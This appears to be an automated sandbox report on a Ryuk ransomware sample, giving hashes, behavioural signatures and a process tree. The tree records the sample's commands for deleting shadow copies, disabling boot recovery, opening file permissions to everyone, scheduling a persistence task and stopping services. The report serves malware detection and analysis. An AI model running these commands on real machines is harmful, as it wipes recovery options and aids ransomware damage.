Analysis
-
max time kernel
188s -
max time network
141s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
20-02-2022 02:03
Static task
static1
Behavioral task
behavioral1
Sample
cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe
Resource
win10v2004-en-20220113
General
-
Target
cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe
-
Size
123KB
-
MD5
c22c2847e3318190b9c9f16dc4b044ca
-
SHA1
c6f8e944701b557a905754551cc939b9c4956bdc
-
SHA256
cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478
-
SHA512
2f1e14bfd5134760a62db30980b8541ead8ffe1ac244e2699d46b255b36299d0e87aab8281b7a08b0c77a9da45ab7a812cbd42147fcdf00246fe6f4afe251012
Malware Config
Extracted
C:\users\Public\RyukReadMe.html
ryuk
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies file permissions 1 TTPs 2 IoCs
Processes:
icacls.exeicacls.exepid process 1608 icacls.exe 1248 icacls.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1696 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exepid process 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
WMIC.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 840 WMIC.exe Token: SeSecurityPrivilege 840 WMIC.exe Token: SeTakeOwnershipPrivilege 840 WMIC.exe Token: SeLoadDriverPrivilege 840 WMIC.exe Token: SeSystemProfilePrivilege 840 WMIC.exe Token: SeSystemtimePrivilege 840 WMIC.exe Token: SeProfSingleProcessPrivilege 840 WMIC.exe Token: SeIncBasePriorityPrivilege 840 WMIC.exe Token: SeCreatePagefilePrivilege 840 WMIC.exe Token: SeBackupPrivilege 840 WMIC.exe Token: SeRestorePrivilege 840 WMIC.exe Token: SeShutdownPrivilege 840 WMIC.exe Token: SeDebugPrivilege 840 WMIC.exe Token: SeSystemEnvironmentPrivilege 840 WMIC.exe Token: SeRemoteShutdownPrivilege 840 WMIC.exe Token: SeUndockPrivilege 840 WMIC.exe Token: SeManageVolumePrivilege 840 WMIC.exe Token: 33 840 WMIC.exe Token: 34 840 WMIC.exe Token: 35 840 WMIC.exe Token: SeBackupPrivilege 1172 vssvc.exe Token: SeRestorePrivilege 1172 vssvc.exe Token: SeAuditPrivilege 1172 vssvc.exe Token: SeIncreaseQuotaPrivilege 840 WMIC.exe Token: SeSecurityPrivilege 840 WMIC.exe Token: SeTakeOwnershipPrivilege 840 WMIC.exe Token: SeLoadDriverPrivilege 840 WMIC.exe Token: SeSystemProfilePrivilege 840 WMIC.exe Token: SeSystemtimePrivilege 840 WMIC.exe Token: SeProfSingleProcessPrivilege 840 WMIC.exe Token: SeIncBasePriorityPrivilege 840 WMIC.exe Token: SeCreatePagefilePrivilege 840 WMIC.exe Token: SeBackupPrivilege 840 WMIC.exe Token: SeRestorePrivilege 840 WMIC.exe Token: SeShutdownPrivilege 840 WMIC.exe Token: SeDebugPrivilege 840 WMIC.exe Token: SeSystemEnvironmentPrivilege 840 WMIC.exe Token: SeRemoteShutdownPrivilege 840 WMIC.exe Token: SeUndockPrivilege 840 WMIC.exe Token: SeManageVolumePrivilege 840 WMIC.exe Token: 33 840 WMIC.exe Token: 34 840 WMIC.exe Token: 35 840 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.execmd.execmd.exenet.exenet.exenet.exedescription pid process target process PID 1888 wrote to memory of 1500 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe SCHTASKS.exe PID 1888 wrote to memory of 1500 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe SCHTASKS.exe PID 1888 wrote to memory of 1500 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe SCHTASKS.exe PID 1888 wrote to memory of 1500 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe SCHTASKS.exe PID 1888 wrote to memory of 1828 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe cmd.exe PID 1888 wrote to memory of 1828 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe cmd.exe PID 1888 wrote to memory of 1828 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe cmd.exe PID 1888 wrote to memory of 1828 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe cmd.exe PID 1888 wrote to memory of 628 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe cmd.exe PID 1888 wrote to memory of 628 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe cmd.exe PID 1888 wrote to memory of 628 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe cmd.exe PID 1888 wrote to memory of 628 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe cmd.exe PID 1888 wrote to memory of 1108 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe cmd.exe PID 1888 wrote to memory of 1108 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe cmd.exe PID 1888 wrote to memory of 1108 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe cmd.exe PID 1888 wrote to memory of 1108 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe cmd.exe PID 1888 wrote to memory of 364 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe cmd.exe PID 1888 wrote to memory of 364 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe cmd.exe PID 1888 wrote to memory of 364 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe cmd.exe PID 1888 wrote to memory of 364 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe cmd.exe PID 1888 wrote to memory of 1608 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe icacls.exe PID 1888 wrote to memory of 1608 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe icacls.exe PID 1888 wrote to memory of 1608 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe icacls.exe PID 1888 wrote to memory of 1608 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe icacls.exe PID 1888 wrote to memory of 1248 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe icacls.exe PID 1888 wrote to memory of 1248 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe icacls.exe PID 1888 wrote to memory of 1248 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe icacls.exe PID 1888 wrote to memory of 1248 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe icacls.exe PID 628 wrote to memory of 1696 628 cmd.exe vssadmin.exe PID 628 wrote to memory of 1696 628 cmd.exe vssadmin.exe PID 628 wrote to memory of 1696 628 cmd.exe vssadmin.exe PID 628 wrote to memory of 1696 628 cmd.exe vssadmin.exe PID 1828 wrote to memory of 840 1828 cmd.exe WMIC.exe PID 1828 wrote to memory of 840 1828 cmd.exe WMIC.exe PID 1828 wrote to memory of 840 1828 cmd.exe WMIC.exe PID 1828 wrote to memory of 840 1828 cmd.exe WMIC.exe PID 1888 wrote to memory of 1128 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe net.exe PID 1888 wrote to memory of 1128 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe net.exe PID 1888 wrote to memory of 1128 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe net.exe PID 1888 wrote to memory of 1128 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe net.exe PID 1888 wrote to memory of 1236 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe net.exe PID 1888 wrote to memory of 1236 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe net.exe PID 1888 wrote to memory of 1236 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe net.exe PID 1888 wrote to memory of 1236 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe net.exe PID 1888 wrote to memory of 1400 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe net.exe PID 1888 wrote to memory of 1400 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe net.exe PID 1888 wrote to memory of 1400 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe net.exe PID 1888 wrote to memory of 1400 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe net.exe PID 1888 wrote to memory of 1964 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe net.exe PID 1888 wrote to memory of 1964 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe net.exe PID 1888 wrote to memory of 1964 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe net.exe PID 1888 wrote to memory of 1964 1888 cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe net.exe PID 1236 wrote to memory of 1524 1236 net.exe net1.exe PID 1236 wrote to memory of 1524 1236 net.exe net1.exe PID 1236 wrote to memory of 1524 1236 net.exe net1.exe PID 1236 wrote to memory of 1524 1236 net.exe net1.exe PID 1128 wrote to memory of 1116 1128 net.exe net1.exe PID 1128 wrote to memory of 1116 1128 net.exe net1.exe PID 1128 wrote to memory of 1116 1128 net.exe net1.exe PID 1128 wrote to memory of 1116 1128 net.exe net1.exe PID 1964 wrote to memory of 1788 1964 net.exe net1.exe PID 1964 wrote to memory of 1788 1964 net.exe net1.exe PID 1964 wrote to memory of 1788 1964 net.exe net1.exe PID 1964 wrote to memory of 1788 1964 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe"C:\Users\Admin\AppData\Local\Temp\cb6e0dcae5a36d4f8bf939b4928708f26453cdef324c205e809b6fec484cf478.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /CREATE /NP /SC DAILY /TN "Print71" /TR "C:\Windows\System32\cmd.exe /c for /l %x in (1,1,50) do start wordpad.exe /p C:\users\Public\r9bQl.dll" /ST 10:25 /SD 02/21/2022 /ED 02/28/20222⤵
- Creates scheduled task(s)
PID:1500 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "WMIC.exe shadowcopy delete"2⤵
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC.exe shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:840 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "vssadmin.exe Delete Shadows /all /quiet"2⤵
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1696 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "bcdedit /set {default} recoveryenabled No & bcdedit /set {default}"2⤵PID:1108
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "bootstatuspolicy ignoreallfailures"2⤵PID:364
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\*" /grant Everyone:F /T /C /Qÿ2⤵
- Modifies file permissions
PID:1608 -
C:\Windows\SysWOW64\icacls.exeicacls "D:\*" /grant Everyone:F /T /C /Qÿ2⤵
- Modifies file permissions
PID:1248 -
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "audioendpointbuilder" /y3⤵PID:1524
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "audioendpointbuilder" /y3⤵PID:1116
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "samss" /y2⤵PID:1400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "samss" /y3⤵PID:988
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "samss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "samss" /y3⤵PID:1788
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1172